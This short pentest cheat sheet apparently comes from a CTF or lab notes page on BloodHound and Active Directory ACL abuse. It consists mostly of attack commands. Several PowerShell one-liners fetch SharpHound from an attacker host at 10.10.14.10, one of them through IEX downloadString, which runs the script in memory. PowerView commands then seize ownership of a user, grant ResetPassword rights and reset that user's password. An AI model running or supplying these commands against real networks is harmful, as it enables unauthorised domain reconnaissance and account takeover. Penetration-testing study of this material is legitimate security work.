Bloodhound

Description

BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment.

SharpHound

.exe.ps1

IEX(New-Object Net.WebClient).downloadFile('http://10.10.14.10/SharpHound.exe', 'SharpHound.exe')

.\SharpHound.exe --CollectionMethods All

IWR -Uri http://10.10.14.10/SharpHound.exe -OutFile SharpHound.exe

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10/SharpHound.ps1')

Invoke-BloodHound -CollectionMethod All

ACL Abuse

Generic Write (Group)Write Owner (User)

net group backups qu35t /add

Set-DomainObjectOwner -identity jeff -OwnerIdentity qu35t 

Add-DomainObjectAcl -TargetIdentity jeff -PrincipalIdentity qu35t -Rights ResetPassword 

$cred = ConvertTo-SecureString 'Passw0rd!' -AsPlainText -force

Set-DomainUserPassword -identity jeff -accountpassword $cred

References

• Github - Official
• Zflemingg1 - ACL Abuse
• Ippsec - Sizzle